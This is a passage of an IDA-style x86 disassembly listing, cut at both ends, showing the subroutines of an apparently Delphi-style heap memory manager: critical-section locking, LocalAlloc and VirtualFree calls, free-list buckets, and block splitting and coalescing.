; sub_401CF4+6C�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebx
add esp, 0FFFFFFE8h
mov ebx, ecx
lea ecx, [eax+3FFFh]
and ecx, 0FFFFC000h
mov [esp+1Ch+var_1C], ecx
add edx, eax
and edx, 0FFFFC000h
mov [esp+1Ch+var_18], edx
mov eax, [esp+1Ch+var_18]
cmp eax, [esp+1Ch+var_1C]
jbe short loc_4018F9
mov ecx, ebx
mov edx, [esp+1Ch+var_18]
sub edx, [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
call sub_4015C8
lea ecx, [esp+1Ch+var_14]
mov edx, ebx
mov eax, offset off_4075E4
call sub_401218
mov ebx, [esp+1Ch+var_14]
test ebx, ebx
jz short loc_4018E2
lea ecx, [esp+1Ch+var_C]
mov edx, [esp+1Ch+var_10]
mov eax, ebx
call sub_401440
mov eax, [esp+1Ch+var_C]
mov [esp+1Ch+var_14], eax
mov eax, [esp+1Ch+var_8]
mov [esp+1Ch+var_10], eax
loc_4018E2: ; CODE XREF: sub_401870+51�j
cmp [esp+1Ch+var_14], 0
jz short loc_4018FD
lea edx, [esp+1Ch+var_14]
mov eax, offset off_4075E4
call sub_4012A0
jmp short loc_4018FD
; ---------------------------------------------------------------------------
loc_4018F9: ; CODE XREF: sub_401870+28�j
xor eax, eax
mov [ebx], eax
loc_4018FD: ; CODE XREF: sub_401870+77�j
; sub_401870+87�j
add esp, 18h
pop ebx
retn
sub_401870 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401904 proc near ; CODE XREF: sub_402160+12�p
; sub_40230C+19�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00402FD4 SIZE 00000036 BYTES
push ebp
mov ebp, esp
push ecx
xor edx, edx
push ebp
push offset loc_4019CC
push dword ptr fs:[edx]
mov fs:[edx], esp
push offset dword_4075B4
call sub_4010DC ; InitializeCriticalSection
cmp ds:byte_407035, 0
jz short loc_401933
push offset dword_4075B4
call sub_4010E4 ; RtlEnterCriticalSection
loc_401933: ; CODE XREF: sub_401904+23�j
mov eax, offset off_4075D4
call sub_401180
mov eax, offset off_4075E4
call sub_401180
mov eax, offset off_407610
call sub_401180
push 0FF8h
push 0
call sub_4010BC ; LocalAlloc
mov ds:dword_40760C, eax
cmp ds:dword_40760C, 0
jz short loc_4019AB
mov eax, 3
loc_401970: ; CODE XREF: sub_401904+7E�j
mov edx, ds:dword_40760C
xor ecx, ecx
mov [edx+eax*4-0Ch], ecx
inc eax
cmp eax, 401h
jnz short loc_401970
mov [ebp+var_4], offset aDzdz ; "DD"
mov eax, [ebp+var_4]
mov edx, [ebp+var_4]
mov [eax+4], edx
mov eax, [ebp+var_4]
mov edx, [ebp+var_4]
mov [eax], edx
mov eax, [ebp+var_4]
mov ds:dword_407600, eax
mov ds:byte_4075AC, 1
loc_4019AB: ; CODE XREF: sub_401904+65�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4019D3
loc_4019B8: ; CODE XREF: sub_401904+CD�j
cmp ds:byte_407035, 0
jz short locret_4019CB
push offset dword_4075B4
call sub_4010EC ; RtlLeaveCriticalSection
locret_4019CB: ; CODE XREF: sub_401904+BB�j
retn
; ---------------------------------------------------------------------------
loc_4019CC: ; DATA XREF: sub_401904+7�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_4019B8
; ---------------------------------------------------------------------------
loc_4019D3: ; DATA XREF: sub_401904+AF�o
mov al, ds:byte_4075AC
pop ecx
pop ebp
retn
sub_401904 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019DC proc near ; CODE XREF: sub_403A24+37�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
cmp ds:byte_4075AC, 0
jz loc_401AD7
xor eax, eax
push ebp
push offset loc_401AD0
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp ds:byte_407035, 0
jz short loc_401A10
push offset dword_4075B4
call sub_4010E4 ; RtlEnterCriticalSection
loc_401A10: ; CODE XREF: sub_4019DC+28�j
mov ds:byte_4075AC, 0
mov eax, ds:dword_40760C
push eax
call sub_4010C4 ; LocalFree
xor eax, eax
mov ds:dword_40760C, eax
mov eax, ds:off_4075D4
mov [ebp+var_8], eax
jmp short loc_401A4E
; ---------------------------------------------------------------------------
loc_401A33: ; CODE XREF: sub_4019DC+7A�j
push 8000h
push 0
mov eax, [ebp+var_8]
mov eax, [eax+8]
push eax
call sub_4010D4 ; VirtualFree
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
loc_401A4E: ; CODE XREF: sub_4019DC+55�j
mov eax, offset off_4075D4
cmp eax, [ebp+var_8]
jnz short loc_401A33
mov eax, offset off_4075D4
call sub_401180
mov eax, offset off_4075E4
call sub_401180
mov eax, offset off_407610
call sub_401180
mov eax, ds:dword_4075CC
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_401AA5
loc_401A84: ; CODE XREF: sub_4019DC+C7�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ds:dword_4075CC, eax
mov eax, [ebp+var_4]
push eax
call sub_4010C4 ; LocalFree
mov eax, ds:dword_4075CC
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_401A84
loc_401AA5: ; CODE XREF: sub_4019DC+A6�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401AD7
loc_401AB2: ; CODE XREF: sub_4019DC+F9�j
cmp ds:byte_407035, 0
jz short loc_401AC5
push offset dword_4075B4
call sub_4010EC ; RtlLeaveCriticalSection
loc_401AC5: ; CODE XREF: sub_4019DC+DD�j
push offset dword_4075B4
call sub_4010F4 ; RtlDeleteCriticalSection
retn
; ---------------------------------------------------------------------------
loc_401AD0: ; DATA XREF: sub_4019DC+16�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_401AB2
; ---------------------------------------------------------------------------
loc_401AD7: ; CODE XREF: sub_4019DC+D�j
; DATA XREF: sub_4019DC+D1�o
pop ecx
pop ecx
pop ebp
retn
sub_4019DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401ADC proc near ; CODE XREF: sub_401C3C+6B�p
; sub_401CB4+25�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebx
add esp, 0FFFFFFF8h
cmp eax, ds:dword_407600
jnz short loc_401AF1
mov edx, [eax+4]
mov ds:dword_407600, edx
loc_401AF1: ; CODE XREF: sub_401ADC+A�j
mov edx, [eax+4]
mov [esp+0Ch+var_C], edx
mov edx, [eax+8]
cmp edx, 1000h
jg short loc_401B50
cmp eax, [esp+0Ch+var_C]
jnz short loc_401B1E
test edx, edx
jns short loc_401B0E
add edx, 3
loc_401B0E: ; CODE XREF: sub_401ADC+2D�j
sar edx, 2
mov eax, ds:dword_40760C
xor ecx, ecx
mov [eax+edx*4-0Ch], ecx
jmp short loc_401B69
; ---------------------------------------------------------------------------
loc_401B1E: ; CODE XREF: sub_401ADC+29�j
test edx, edx
jns short loc_401B25
add edx, 3
loc_401B25: ; CODE XREF: sub_401ADC+44�j
sar edx, 2
mov ecx, ds:dword_40760C
mov ebx, [esp+0Ch+var_C]
mov [ecx+edx*4-0Ch], ebx
mov eax, [eax]
mov [esp+0Ch+var_8], eax
mov eax, [esp+0Ch+var_C]
mov edx, [esp+0Ch+var_8]
mov [eax], edx
mov eax, [esp+0Ch+var_8]
mov edx, [esp+0Ch+var_C]
mov [eax+4], edx
jmp short loc_401B69
; ---------------------------------------------------------------------------
loc_401B50: ; CODE XREF: sub_401ADC+24�j
mov eax, [eax]
mov [esp+0Ch+var_8], eax
mov eax, [esp+0Ch+var_C]
mov edx, [esp+0Ch+var_8]
mov [eax], edx
mov eax, [esp+0Ch+var_8]
mov edx, [esp+0Ch+var_C]
mov [eax+4], edx
loc_401B69: ; CODE XREF: sub_401ADC+40�j
; sub_401ADC+72�j
pop ecx
pop edx
pop ebx
retn
sub_401ADC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B70 proc near ; CODE XREF: sub_401CF4+F�p
push ebx
push ecx
mov ecx, esp
mov edx, ds:off_407610
mov [ecx], edx
jmp short loc_401B96
; ---------------------------------------------------------------------------
loc_401B7E: ; CODE XREF: sub_401B70+2D�j
mov edx, [ecx]
mov edx, [edx+8]
cmp eax, edx
jb short loc_401B90
mov ebx, [ecx]
add edx, [ebx+0Ch]
cmp eax, edx
jb short loc_401BAD
loc_401B90: ; CODE XREF: sub_401B70+15�j
mov edx, [ecx]
mov edx, [edx]
mov [ecx], edx
loc_401B96: ; CODE XREF: sub_401B70+C�j
mov edx, offset off_407610
cmp edx, [ecx]
jnz short loc_401B7E
mov ds:dword_4075B0, 3
xor eax, eax
mov [ecx], eax
loc_401BAD: ; CODE XREF: sub_401B70+1E�j
mov eax, [ecx]
pop edx
pop ebx
retn
sub_401B70 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401BB4 proc near ; CODE XREF: sub_401CF4+7E�p
; sub_401EF4+68�p
var_8 = dword ptr -8
push ebx
push ecx
mov ecx, edx
sub ecx, 4
lea ebx, [ecx+eax]
mov [esp+8+var_8], ebx
cmp edx, 10h
jl short loc_401BD9
mov edx, [esp+8+var_8]
mov dword ptr [edx], 80000007h
mov edx, ecx
call sub_401DB0
pop edx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401BD9: ; CODE XREF: sub_401BB4+10�j
cmp edx, 4
jl short loc_401BED
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
mov eax, [esp+8+var_8]
mov [eax], ecx
loc_401BED: ; CODE XREF: sub_401BB4+28�j
pop edx
pop ebx
retn
sub_401BB4 endp
; =============== S U B R O U T I N E =======================================
sub_401BF0 proc near ; CODE XREF: sub_401C14+D�p
; sub_401EA8+36�p ...
inc ds:dword_40759C
mov edx, eax
sub edx, 4
mov edx, [edx]
and edx, 7FFFFFFCh
sub edx, 4
add ds:dword_4075A0, edx
call sub_40230C
retn
sub_401BF0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401C14 proc near ; CODE XREF: sub_401CF4+A0�p
cmp edx, 0Ch
jl short loc_401C27
or edx, 2
mov [eax], edx
add eax, 4
call sub_401BF0
retn
; ---------------------------------------------------------------------------
loc_401C27: ; CODE XREF: sub_401C14+3�j
cmp edx, 4
jl short loc_401C36
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
loc_401C36: ; CODE XREF: sub_401C14+16�j
add eax, edx
and dword ptr [eax], 0FFFFFFFEh
retn
sub_401C14 endp
; =============== S U B R O U T I N E =======================================
sub_401C3C proc near ; CODE XREF: sub_401EF4+36�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov edx, eax
sub edx, 4
mov edx, [edx]
mov ecx, edx
and ecx, 80000002h
cmp ecx, 80000002h
jz short loc_401C60
mov ds:dword_4075B0, 4
loc_401C60: ; CODE XREF: sub_401C3C+18�j
mov ebx, edx
and ebx, 7FFFFFFCh
sub eax, ebx
mov ecx, eax
xor edx, [ecx]
test edx, 0FFFFFFFEh
jz short loc_401C80
mov ds:dword_4075B0, 5
loc_401C80: ; CODE XREF: sub_401C3C+38�j
test byte ptr [ecx], 1
jz short loc_401CAE
mov edx, eax
sub edx, 0Ch
mov esi, [edx+8]
sub eax, esi
mov [esp+0Ch+var_C], eax
mov eax, [esp+0Ch+var_C]
cmp esi, [eax+8]
jz short loc_401CA4
mov ds:dword_4075B0, 6
loc_401CA4: ; CODE XREF: sub_401C3C+5C�j
mov eax, [esp+0Ch+var_C]
call sub_401ADC
add ebx, esi
loc_401CAE: ; CODE XREF: sub_401C3C+47�j
mov eax, ebx
pop edx
pop esi
pop ebx
retn
sub_401C3C endp
; =============== S U B R O U T I N E =======================================
sub_401CB4 proc near ; CODE XREF: sub_401EF4+4F�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov ebx, eax
xor esi, esi
mov eax, [ebx]
test eax, 80000000h
jz short loc_401CCF
and eax, 7FFFFFFCh
add esi, eax
add ebx, eax
mov eax, [ebx]
loc_401CCF: ; CODE XREF: sub_401CB4+E�j
test al, 2
jnz short loc_401CEB
mov [esp+0Ch+var_C], ebx
mov eax, [esp+0Ch+var_C]
call sub_401ADC
mov eax, [esp+0Ch+var_C]
mov eax, [eax+8]
add esi, eax
add ebx, eax
and dword ptr [ebx], 0FFFFFFFEh
loc_401CEB: ; CODE XREF: sub_401CB4+1D�j
mov eax, esi
pop edx
pop esi
pop ebx
retn
sub_401CB4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401CF4 proc near ; CODE XREF: sub_401DB0+A7�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov esi, edx
mov ebp, eax
xor ebx, ebx
mov eax, ebp
call sub_401B70
mov [esp+1Ch+var_14], eax
cmp [esp+1Ch+var_14], 0
jz loc_401DA6
mov eax, [esp+1Ch+var_14]
mov edi, [eax+8]
mov eax, edi
mov edx, [esp+1Ch+var_14]
add eax, [edx+0Ch]
mov edx, eax
lea ecx, [esi+ebp]
sub edx, ecx
cmp edx, 0Ch
jg short loc_401D37
mov esi, eax
sub esi, ebp
loc_401D37: ; CODE XREF: sub_401CF4+3D�j
mov eax, ebp
sub eax, edi
cmp eax, 0Ch
jge short loc_401D56
mov eax, [esp+1Ch+var_14]
mov edx, ebp
sub edx, [eax+8]
add edx, esi
mov ecx, esp
mov eax, edi
call sub_401870
jmp short loc_401D65
; ---------------------------------------------------------------------------
loc_401D56: ; CODE XREF: sub_401CF4+4A�j
mov ecx, esp
mov edx, esi
sub edx, 4
lea eax, [ebp+4]
call sub_401870
loc_401D65: ; CODE XREF: sub_401CF4+60�j
mov edi, [esp+1Ch+var_1C]
test edi, edi
jz short loc_401DA6
mov edx, edi
sub edx, ebp
mov eax, ebp
call sub_401BB4
mov edx, [esp+1Ch+var_14]
mov edx, [edx+8]
mov ecx, [esp+1Ch+var_14]
add edx, [ecx+0Ch]
mov eax, edi
add eax, [esp+1Ch+var_18]
cmp edx, eax
jbe short loc_401D99
lea edx, [esi+ebp]
sub edx, eax
call sub_401C14
loc_401D99: ; CODE XREF: sub_401CF4+99�j
mov edx, esp
mov eax, [esp+1Ch+var_14]
call sub_4012A0
mov bl, 1
loc_401DA6: ; CODE XREF: sub_401CF4+1D�j
; sub_401CF4+76�j
mov eax, ebx
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401CF4 endp
; =============== S U B R O U T I N E =======================================
sub_401DB0 proc near ; CODE XREF: sub_401BB4+1D�p
; sub_402018+EE�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF4h
mov ebx, edx
mov esi, eax
mov [esp+14h+var_14], esi
mov eax, [esp+14h+var_14]
mov [eax+8], ebx
mov eax, [esp+14h+var_14]
add eax, ebx
sub eax, 0Ch
mov [eax+8], ebx
cmp ebx, 1000h
jg short loc_401E4B
mov eax, ebx
test eax, eax
jns short loc_401DDE
add eax, 3
loc_401DDE: ; CODE XREF: sub_401DB0+29�j
sar eax, 2
mov edx, ds:dword_40760C
mov edx, [edx+eax*4-0Ch]
mov [esp+14h+var_10], edx
cmp [esp+14h+var_10], 0
jnz short loc_401E19
mov edx, ds:dword_40760C
mov ecx, [esp+14h+var_14]
mov [edx+eax*4-0Ch], ecx
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_14]
mov [eax+4], edx
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_14]
mov [eax], edx
jmp loc_401EA1
; ---------------------------------------------------------------------------
loc_401E19: ; CODE XREF: sub_401DB0+44�j
mov eax, [esp+14h+var_10]
mov eax, [eax]
mov [esp+14h+var_C], eax
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_10]
mov [eax+4], edx
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_C]
mov [eax], edx
mov eax, [esp+14h+var_10]
mov edx, [esp+14h+var_14]
mov [eax], edx
mov eax, [esp+14h+var_C]
mov edx, [esp+14h+var_14]
mov [eax+4], edx
jmp short loc_401EA1
; ---------------------------------------------------------------------------
loc_401E4B: ; CODE XREF: sub_401DB0+23�j
cmp ebx, 3C00h
jl short loc_401E60
mov edx, ebx
mov eax, esi
call sub_401CF4
test al, al
jnz short loc_401EA1
loc_401E60: ; CODE XREF: sub_401DB0+A1�j
mov eax, ds:dword_407600
mov [esp+14h+var_10], eax
mov eax, [esp+14h+var_14]
mov ds:dword_407600, eax
mov eax, [esp+14h+var_10]
mov eax, [eax]
mov [esp+14h+var_C], eax
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_10]
mov [eax+4], edx
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_C]
mov [eax], edx
mov eax, [esp+14h+var_10]
mov edx, [esp+14h+var_14]
mov [eax], edx
mov eax, [esp+14h+var_C]
mov edx, [esp+14h+var_14]
mov [eax+4], edx
loc_401EA1: ; CODE XREF: sub_401DB0+64�j
; sub_401DB0+99�j ...
add esp, 0Ch
pop esi
pop ebx
retn
sub_401DB0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401EA8 proc near ; CODE XREF: sub_401EF4+F�p
; sub_40230C+11D�p ...
cmp ds:dword_407604, 0
jle short locret_401EF1
cmp ds:dword_407604, 0Ch
jge short loc_401EC6
mov ds:dword_4075B0, 7
jmp short locret_401EF1
; ---------------------------------------------------------------------------
loc_401EC6: ; CODE XREF: sub_401EA8+10�j
mov eax, ds:dword_407604
or eax, 2
mov edx, ds:dword_407608
mov [edx], eax
mov eax, ds:dword_407608
add eax, 4
call sub_401BF0
xor eax, eax
mov ds:dword_407608, eax
xor eax, eax
mov ds:dword_407604, eax
locret_401EF1: ; CODE XREF: sub_401EA8+7�j
; sub_401EA8+1C�j
retn
sub_401EA8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401EF4 proc near ; CODE XREF: sub_401F80+18�p
; sub_401FAC+1D�p
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFF0h
mov esi, eax
lea edi, [esp+1Ch+var_1C]
movsd
movsd
mov edi, esp
call sub_401EA8
lea ecx, [esp+1Ch+var_14]
mov edx, edi
mov eax, offset off_407610
call sub_401218
mov ebx, [esp+1Ch+var_14]
test ebx, ebx
jnz short loc_401F24
xor eax, eax
jmp short loc_401F76
; ---------------------------------------------------------------------------
loc_401F24: ; CODE XREF: sub_401EF4+2A�j
mov eax, [edi]
cmp ebx, eax
jnb short loc_401F34
call sub_401C3C
sub [edi], eax
add [edi+4], eax
loc_401F34: ; CODE XREF: sub_401EF4+34�j
mov eax, [edi]
add eax, [edi+4]
mov esi, ebx
add esi, [esp+1Ch+var_10]
cmp eax, esi
jnb short loc_401F4B
call sub_401CB4
add [edi+4], eax
loc_401F4B: ; CODE XREF: sub_401EF4+4D�j
mov eax, [edi]
add eax, [edi+4]
cmp esi, eax
jnz short loc_401F65
sub eax, 4
mov edx, 4
call sub_401BB4
sub dword ptr [edi+4], 4
loc_401F65: ; CODE XREF: sub_401EF4+5E�j
mov eax, [edi]
mov ds:dword_407608, eax
mov eax, [edi+4]
mov ds:dword_407604, eax
mov al, 1
loc_401F76: ; CODE XREF: sub_401EF4+2E�j
add esp, 10h
pop edi
pop esi
pop ebx
retn
sub_401EF4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401F80 proc near ; CODE XREF: sub_402018+76�p
var_C = dword ptr -0Ch
push ebx
add esp, 0FFFFFFF8h
mov ebx, eax
mov edx, esp
lea eax, [ebx+4]
call sub_401684
cmp [esp+0Ch+var_C], 0
jz short loc_401FA1
mov eax, esp
call sub_401EF4
test al, al
jnz short loc_401FA5
loc_401FA1: ; CODE XREF: sub_401F80+14�j
xor eax, eax
jmp short loc_401FA7
; ---------------------------------------------------------------------------
loc_401FA5: ; CODE XREF: sub_401F80+1F�j
mov al, 1
loc_401FA7: ; CODE XREF: sub_401F80+23�j
pop ecx
pop edx
pop ebx
retn
sub_401F80 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401FAC proc near ; CODE XREF: sub_4024E4+1C3�p
var_10 = dword ptr -10h
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, edx
mov ebx, eax
mov ecx, esp
lea edx, [esi+4]
mov eax, ebx
call sub_40172C
cmp [esp+10h+var_10], 0
jz short loc_401FD2
mov eax, esp
call sub_401EF4
test al, al
jnz short loc_401FD6
loc_401FD2: ; CODE XREF: sub_401FAC+19�j
xor eax, eax
jmp short loc_401FD8
; ---------------------------------------------------------------------------
loc_401FD6: ; CODE XREF: sub_401FAC+24�j
mov al, 1
loc_401FD8: ; CODE XREF: sub_401FAC+28�j
pop ecx
pop edx
pop esi
pop ebx
retn
sub_401FAC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401FE0 proc near ; CODE XREF: sub_402018+68�p
push ecx
mov edx, esp
xor ecx, ecx
mov [edx], ecx
test eax, eax
jns short loc_401FEE
add eax, 3
loc_401FEE: ; CODE XREF: sub_401FE0+9�j
sar eax, 2
cmp eax, 400h
jg short loc_402011
loc_401FF8: ; CODE XREF: sub_401FE0+2F�j
mov ecx, ds:dword_40760C
mov ecx, [ecx+eax*4-0Ch]
mov [edx], ecx
cmp dword ptr [edx], 0
jnz short loc_402011
inc eax
cmp eax, 401h
jnz short loc_401FF8
loc_402011: ; CODE XREF: sub_401FE0+16�j
; sub_401FE0+27�j
mov eax, [edx]
pop edx
retn
sub_401FE0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402018 proc near ; CODE XREF: sub_402160+173�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov ebx, eax
lea esi, [esp+1Ch+var_14]
mov edi, offset dword_407600
mov ebp, offset dword_407604
loc_40202F: ; CODE XREF: sub_402018+8C�j
mov eax, dword ptr ds:aDzdz+4
mov [esi], eax
mov eax, [esi]
cmp ebx, [eax+8]
jle loc_4020EC
mov eax, [edi]
mov [esi], eax
mov eax, [esi]
mov eax, [eax+8]
cmp ebx, eax
jle loc_4020EC
mov edx, [esi]
mov [edx+8], ebx
loc_402057: ; CODE XREF: sub_402018+4B�j
mov edx, [esi]
mov edx, [edx+4]
mov [esi], edx
mov edx, [esi]
cmp ebx, [edx+8]
jg short loc_402057
mov edx, [edi]
mov [edx+8], eax
mov eax, [esi]
cmp eax, [edi]
jz short loc_402076
mov eax, [esi]
mov [edi], eax
jmp short loc_4020EC
; ---------------------------------------------------------------------------
loc_402076: ; CODE XREF: sub_402018+56�j
cmp ebx, 1000h
jg short loc_40208C
mov eax, ebx
call sub_401FE0
mov [esi], eax
cmp dword ptr [esi], 0
jnz short loc_4020EC
loc_40208C: ; CODE XREF: sub_402018+64�j
mov eax, ebx
call sub_401F80
test al, al
jnz short loc_4020A1
xor eax, eax
mov [esp+1Ch+var_1C], eax
jmp loc_402155
; ---------------------------------------------------------------------------
loc_4020A1: ; CODE XREF: sub_402018+7D�j
cmp ebx, [ebp+0]
jg short loc_40202F
sub [ebp+0], ebx
cmp dword ptr [ebp+0], 0Ch
jge short loc_4020B7
add ebx, [ebp+0]
xor eax, eax
mov [ebp+0], eax
loc_4020B7: ; CODE XREF: sub_402018+95�j
mov eax, ds:dword_407608
mov [esp+1Ch+var_18], eax
add ds:dword_407608, ebx
mov eax, ebx
or eax, 2
mov edx, [esp+1Ch+var_18]
mov [edx], eax
mov eax, [esp+1Ch+var_18]
add eax, 4
mov [esp+1Ch+var_1C], eax
inc ds:dword_40759C
sub ebx, 4
add ds:dword_4075A0, ebx
jmp short loc_402155
; ---------------------------------------------------------------------------
loc_4020EC: ; CODE XREF: sub_402018+23�j
; sub_402018+34�j ...
mov eax, [esi]
call sub_401ADC
mov eax, [esi]
mov edx, [eax+8]
mov eax, edx
sub eax, ebx
cmp eax, 0Ch
jl short loc_40210D
mov edx, [esi]
add edx, ebx
xchg eax, edx
call sub_401DB0
jmp short loc_40212B
; ---------------------------------------------------------------------------
loc_40210D: ; CODE XREF: sub_402018+E7�j
mov ebx, edx
mov eax, [esi]
cmp eax, [edi]
jnz short loc_40211C
mov eax, [esi]
mov eax, [eax+4]
mov [edi], eax
loc_40211C: ; CODE XREF: sub_402018+FB�j
mov eax, [esi]
add eax, ebx
mov [esp+1Ch+var_18], eax
mov eax, [esp+1Ch+var_18]
and dword ptr [eax], 0FFFFFFFEh
loc_40212B: ; CODE XREF: sub_402018+F3�j
mov eax, [esi]
mov [esp+1Ch+var_18], eax
mov eax, ebx
or eax, 2
mov edx, [esp+1Ch+var_18]
mov [edx], eax
mov eax, [esp+1Ch+var_18]
add eax, 4
mov [esp+1Ch+var_1C], eax
inc ds:dword_40759C
sub ebx, 4
add ds:dword_4075A0, ebx
loc_402155: ; CODE XREF: sub_402018+84�j
; sub_402018+D2�j
mov eax, [esp+1Ch+var_1C]
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_402018 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402160 proc near ; CODE XREF: sub_4026E8+5D�p
; sub_4027B4+A�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
mov ebx, eax
cmp ds:byte_4075AC, 0
jnz short loc_40217B
call sub_401904
test al, al
jz short loc_402183
loc_40217B: ; CODE XREF: sub_402160+10�j
cmp ebx, 7FFFFFF8h
jle short loc_40218D
loc_402183: ; CODE XREF: sub_402160+19�j
xor eax, eax
mov [ebp+var_4], eax
jmp loc_402303
; ---------------------------------------------------------------------------
loc_40218D: ; CODE XREF: sub_402160+21�j
xor edx, edx
push ebp
push offset loc_4022FC
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_407035, 0
jz short loc_4021AE
push offset dword_4075B4
call sub_4010E4 ; RtlEnterCriticalSection
loc_4021AE: ; CODE XREF: sub_402160+42�j
add ebx, 7
and ebx, 0FFFFFFFCh
cmp ebx, 0Ch
jge short loc_4021BE
mov ebx, 0Ch
loc_4021BE: ; CODE XREF: sub_402160+57�j
cmp ebx, 1000h
jg loc_402276
mov eax, ebx
test eax, eax
jns short loc_4021D3
add eax, 3
loc_4021D3: ; CODE XREF: sub_402160+6E�j
sar eax, 2
mov edx, ds:dword_40760C
mov edx, [edx+eax*4-0Ch]
mov [ebp+var_8], edx
cmp [ebp+var_8], 0
jz loc_402276
mov edx, [ebp+var_8]
add edx, ebx
mov [ebp+var_14], edx
mov edx, [ebp+var_14]
and dword ptr [edx], 0FFFFFFFEh
mov edx, [ebp+var_8]
mov edx, [edx+4]
mov [ebp+var_10], edx
mov edx, [ebp+var_10]
cmp edx, [ebp+var_8]
jnz short loc_40221A
mov edx, ds:dword_40760C
xor ecx, ecx
mov [edx+eax*4-0Ch], ecx
jmp short loc_402240
; ---------------------------------------------------------------------------
loc_40221A: ; CODE XREF: sub_402160+AA�j
mov edx, ds:dword_40760C
mov ecx, [ebp+var_10]
mov [edx+eax*4-0Ch], ecx
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov edx, [ebp+var_10]
mov [eax+4], edx
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
mov [eax], edx
loc_402240: ; CODE XREF: sub_402160+B8�j
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_8]
mov eax, [eax+8]
or eax, 2
mov edx, [ebp+var_14]
mov [edx], eax
mov eax, [ebp+var_14]
add eax, 4
mov [ebp+var_4], eax
inc ds:dword_40759C
sub ebx, 4
add ds:dword_4075A0, ebx
call sub_403090
jmp loc_402303
; ---------------------------------------------------------------------------
loc_402276: ; CODE XREF: sub_402160+64�j
; sub_402160+87�j
cmp ebx, ds:dword_407604
jg short loc_4022D1
sub ds:dword_407604, ebx
cmp ds:dword_407604, 0Ch
jge short loc_40229A
add ebx, ds:dword_407604
xor eax, eax
mov ds:dword_407604, eax
loc_40229A: ; CODE XREF: sub_402160+12B�j
mov eax, ds:dword_407608
mov [ebp+var_14], eax
add ds:dword_407608, ebx
mov eax, ebx
or eax, 2
mov edx, [ebp+var_14]
mov [edx], eax
mov eax, [ebp+var_14]
add eax, 4
mov [ebp+var_4], eax
inc ds:dword_40759C
sub ebx, 4
add ds:dword_4075A0, ebx
call sub_403090
jmp short loc_402303
; ---------------------------------------------------------------------------
loc_4022D1: ; CODE XREF: sub_402160+11C�j
mov eax, ebx
call sub_402018
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402303
loc_4022E8: ; CODE XREF: sub_402160+1A1�j
cmp ds:byte_407035, 0
jz short locret_4022FB
push offset dword_4075B4
